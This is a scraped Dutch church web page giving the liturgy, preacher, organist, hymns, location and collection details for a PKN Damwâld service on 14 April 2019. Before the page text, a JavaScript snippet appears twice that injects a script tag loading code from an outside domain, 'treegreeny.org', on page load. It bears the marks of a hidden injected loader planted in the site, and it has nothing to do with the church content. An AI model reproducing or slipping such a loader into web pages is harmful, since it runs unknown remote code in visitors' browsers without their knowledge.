;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 14 april 2019 14:00 uur - PKN Damwâld
zondag 14 april 2019
14:00 uur

Kerkdienst zondag 14 april 2019 14:00 uur

Informatie

Voorganger:Ds. B. Terlouw, De Westereen
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Ps 118 : 9
Aanvangslied Gezang 173 : 1 en 5
Stil gebed // Votum en Groet
Gebed om verlichting met de HG
We zingen: Gezang 127 : 1 en 6
We lezen: Marcus 8:27-37
We zingen: Gezang 177 : 1, 2, 5 en 6
Uitleg en verkondiging .
We zingen: Gezang 442 : 1, 2 en 3
Geloofsbelijdenis HC zondag 1 v/a 1 Wat is uw enige troost
We zingen: Elb 346 : 1 en 3
Pastorale mededelingen / Dankgebed en voorbeden
Collecte
Slotlied : Elb 246 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Jeugdwerk

40 Dagentijd: Jeugdwerk - Jongeren doorleven het Paasverhaal
Veel Christelijke jongeren hebben het Paasverhaal al vaak gehoord. Komt de boodschap van Pasen bij hen nog wel aan? JOP, Jong Protestant, ontwikkelde een verrassend nieuw spel voor kerkelijke jongeren: de PaasChallenge. In dit spel met 'Wie-is-de-mol'-achtige elementen kruipen jongeren een nacht lang in de huid van een hoofdpersoon uit het Paasverhaal. Ze krijgen te maken met emoties als achterdocht, eenzaamheid, vermoeidheid en troost. Een deel van de opdrachten speelt zich buiten af, de ontknoping vindt plaats op Paasmorgen. De eerste editie was een groot succes: bijna 2.000 jongeren van maar liefst 150 jeugdgroepen uit heel Nederland deden mee. Collecteer mee, zodat JOP rond Pasen jongeren met dit uitdagend spel bij de kerk (blijven) betrekken

Tweede collecte: Kerk
Uitganscollecte: Kerk